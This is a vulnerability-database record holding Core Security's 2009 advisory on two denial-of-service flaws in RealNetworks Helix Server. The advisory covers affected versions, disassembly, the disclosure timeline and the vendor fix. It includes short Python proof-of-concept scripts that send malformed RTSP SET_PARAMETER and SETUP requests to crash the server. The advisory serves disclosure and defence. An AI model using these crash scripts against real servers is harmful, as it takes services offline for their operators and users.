s.send(setRequest)\r\n\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe following output is written in the log file:\r\n\r\n/-----------\r\n\r\n4068: FATAL ERROR: The server has run out of memory!\r\nFATAL ERROR: Last request was rounded up to 1155072 bytes\r\nTrace:\r\n0x00409C96\r\n...\r\n...\r\n...\r\n0x00000000\r\nFATAL ERROR: Server Terminated\r\n\r\n- -----------/\r\n\r\n\r\n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\r\n\r\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\r\nis absent in the request line. 
While handling this kind of malformed\r\nrequest the server crashes with an access violation.\r\n\r\nThe code section which triggers the access violation is:\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n if only the "/" (0x2F) character is sent, the program tries to copy\r\nfrom 0 and the access violation exception is raised.\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n The following code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = "SETUP / RTSP/1.0\\r\\n\\r\\n"\r\n\r\ns.send(setRequest)\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-03-04:\r\nCore Security Technologies notifies RealNetworks of the vulnerability.\r\nCore initially schedules publication of its advisory to April 6th, 2009.\r\n\r\n. 2009-03-16:\r\nCore notifies again RealNetworks of the vulnerability.\r\n\r\n. 2009-03-16:\r\nRealNetworks identifies the vulnerability alert as SPAM.\r\n\r\n. 2009-03-20:\r\nThe RealNetworks team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2009-03-23:\r\nTechnical details sent to RealNetworks team by Core. RealNetworks\r\nacknowledges reception.\r\n\r\n. 2009-03-30:\r\nCore requests information about the plans of RealNetworks to fix the\r\nvulnerabilities.\r\n\r\n. 2009-03-30:\r\nRealNetworks responds that fixes will be included in the next public\r\nrelease - currently targeted for July 2009.\r\n\r\n. 
2009-05-04:\r\nCore requests RealNetworks a technical analysis of the vulnerabilities,\r\na list of the affected versions of Helix Server, and a detailed timeline\r\nfor developing, testing and releasing fixes for these vulnerabilities.\r\nIt is only based on that information that Core can reevaluate its\r\nadvisory publication timeframe (which was originally scheduled to be\r\npublished on April 6).\r\n\r\n. 2009-05-05:\r\nRealNetworks responds that fixes will be available in mid-2009, most\r\nlikely in the July time frame, and that to protect its customer base\r\nRealNetworks will not provide additional details until the release is\r\npublicly available.\r\n\r\n. 2009-05-05:\r\nCore requests a more precise estimation for the release of fixes (no\r\nreply received).\r\n\r\n. 2009-05-29:\r\nCore requests again RealNetworks an estimated date for the release of\r\nfixes, and technical details about the issues. In the meantime, the\r\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\r\nreply received).\r\n\r\n. 2009-07-16:\r\nAn updated version of the advisory was sent to RealNetworks by Core.\r\nCore requests again information about this issue.\r\n\r\n. 2009-07-17:\r\nCore is made aware that Real Networks has released the Security Update\r\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\r\nServer and the Helix Mobile Server have been updated to ensure that the\r\nabove vulnerabilities have been resolved.\r\n\r\n. 2009-07-17:\r\nThe advisory CORE-2009-0227 is published by Core.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] RealNetworks\r\nhttp://www.realnetworks.com/\r\n[2] RealNetworks Security Update 071409HS\r\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\r\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\r\n=9iPO\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11832", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:32", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-17T00:00:00", "published": "2009-07-17T00:00:00", "href": "https://packetstormsecurity.com/files/79376/Core-Security-Technologies-Advisory-2009.0227.html", "id": "PACKETSTORM:79376", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0227", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nReal Helix DNA RTSP and SETUP request handler vulnerabilities \n \n \n1. *Advisory Information* \n \nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities \nAdvisory ID: CORE-2009-0227 \nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna \nDate published: 2009-07-17 \nDate of last update: 2009-07-17 \nVendors contacted: RealNetworks \nRelease mode: Forced release \n \n \n2. *Vulnerability Information* \n \nClass: Denial of service (DoS) \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: N/A \nCVE Name: CVE-2009-2533, CVE-2009-2534 \n \n \n3. *Vulnerability Description* \n \nHelix Server is a multi-format cross-platform streaming server. 
Two \nvulnerabilities have been found, that could allow a remote attacker to \ncrash the Helix Server. \n \nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty \n'DataConvertBuffer' parameter is received by the server, it will raise \nan exception reading an invalid direction of memory. This exception is \nusually handled correctly but if you send this malformed request \nmultiple times in a short period of time, it could render the Helix \nServer unresponsive and terminate its execution. \n \nDuring the 'SETUP' request handling, a 0x2F character is searched in the \nrequest line, if this byte is absent the process crashes with an access \nviolation. \n \n \n4. *Vulnerable packages* \n \n. Helix Server Version 12.x \n. Helix Mobile Server Version 12.x \n. The vulnerabilities were investigated on Helix Server Version \n12.0.1.215 (Tahiti) Build 175002/12667 \n \n \n5. *Non-vulnerable packages* \n \n. Helix Server Version 13.0.0 \n. Helix Mobile Server Version 13.0.0 \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nAccording to the Security Update 071409HS [2] published by RealNetworks: \n\"The vulnerability is resolved on the following platforms by installing \nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This \nonly pertains to supported versions of the platforms listed below. The \nupdated version will be available on your RealNetworks PAM site after \n12:00 am PST, on July 14, 2009.\" \n \n. Red Hat Enterprise Linux 4 \n. Red Hat Enterprise Linux 5 \n. Sun Solaris 10 \n. Windows 2003 \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Damian Frizza \nfrom Core Security Technologies. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* \n \nThe problem arises when the 'rmserver' process receives an 'RTSP \n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' \nparameter. 
The handling code reads at the memory location zero (0) and \ntriggers an exception, which is handled correctly. However sending this \nmalformed request multiple times renders the rmserver process \nunresponsive and subsequently stops its execution. \n \nThe code section which triggers the exception is: \n \n/----------- \n \n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 \n*Sets the content of the local variable to 0 \n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] \n0045806F |. 50 PUSH EAX \n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] \n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] \n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * \nTries to read from 0 memory location \n \n- -----------/ \n \nThe following PoC code reproduces the issue: \n \n/----------- \n \nimport socket \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(('172.16.132.133',554)) \n \nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\" \nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\" \n \nfor i in range(5): \n    print i \n    s.send(setRequest) \n \ns.close() \n \n- -----------/ \n \n \n \nThe following output is written in the log file: \n \n/----------- \n \n4068: FATAL ERROR: The server has run out of memory! \nFATAL ERROR: Last request was rounded up to 1155072 bytes \nTrace: \n0x00409C96 \n... \n... \n... \n0x00000000 \nFATAL ERROR: Server Terminated \n \n- -----------/ \n \n \n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* \n \nThe problem arises when the 'SETUP' request is handled and the byte 0x2F \nis absent in the request line. While handling this kind of malformed \nrequest the server crashes with an access violation. \n \nThe code section which triggers the access violation is: \n \n/----------- \n \n0047A490 |. 6A 2F PUSH 2F \n0047A492 |. 56 PUSH ESI \n0047A493 |. 
FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] \n; MSVCR71.strchr \n \n- -----------/ \n \nif only the \"/\" (0x2F) character is sent, the program tries to copy \nfrom 0 and the access violation exception is raised. \n \n/----------- \n \n0047A490 |. 6A 2F PUSH 2F \n0047A492 |. 56 PUSH ESI \n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] \n; MSVCR71.strchr \n \n- -----------/ \n \nThe following code reproduces the issue: \n \n/----------- \n \nimport socket \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(('172.16.132.133',554)) \n \nsetRequest = \"SETUP / RTSP/1.0\\r\\n\\r\\n\" \n \ns.send(setRequest) \ns.close() \n \n- -----------/ \n \n \n9. *Report Timeline* \n \n. 2009-03-04: \nCore Security Technologies notifies RealNetworks of the vulnerability. \nCore initially schedules publication of its advisory to April 6th, 2009. \n \n. 2009-03-16: \nCore notifies again RealNetworks of the vulnerability. \n \n. 2009-03-16: \nRealNetworks identifies the vulnerability alert as SPAM. \n \n. 2009-03-20: \nThe RealNetworks team asks Core for a technical description of the \nvulnerability. \n \n. 2009-03-23: \nTechnical details sent to RealNetworks team by Core. RealNetworks \nacknowledges reception. \n \n. 2009-03-30: \nCore requests information about the plans of RealNetworks to fix the \nvulnerabilities. \n \n. 2009-03-30: \nRealNetworks responds that fixes will be included in the next public \nrelease - currently targeted for July 2009. \n \n. 2009-05-04: \nCore requests RealNetworks a technical analysis of the vulnerabilities, \na list of the affected versions of Helix Server, and a detailed timeline \nfor developing, testing and releasing fixes for these vulnerabilities. \nIt is only based on that information that Core can reevaluate its \nadvisory publication timeframe (which was originally scheduled to be \npublished on April 6). \n \n. 
2009-05-05: \nRealNetworks responds that fixes will be available in mid-2009, most \nlikely in the July time frame, and that to protect its customer base \nRealNetworks will not provide additional details until the release is \npublicly available. \n \n. 2009-05-05: \nCore requests a more precise estimation for the release of fixes (no \nreply received). \n \n. 2009-05-29: \nCore requests again RealNetworks an estimated date for the release of \nfixes, and technical details about the issues. In the meantime, the \npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no \nreply received). \n \n. 2009-07-16: \nAn updated version of the advisory was sent to RealNetworks by Core. \nCore requests again information about this issue. \n \n. 2009-07-17: \nCore is made aware that Real Networks has released the Security Update \n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix \nServer and the Helix Mobile Server have been updated to ensure that the \nabove vulnerabilities have been resolved. \n \n. 2009-07-17: \nThe advisory CORE-2009-0227 is published by Core. \n \n \n \n10. *References* \n \n[1] RealNetworks \nhttp://www.realnetworks.com/ \n[2] RealNetworks Security Update 071409HS \nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. 
\n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2009 Core Security \nTechnologies and (c) 2009 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.8 (MingW32) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH \nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh \n=9iPO \n-----END PGP SIGNATURE----- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/79376/CORE-2009-0227.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}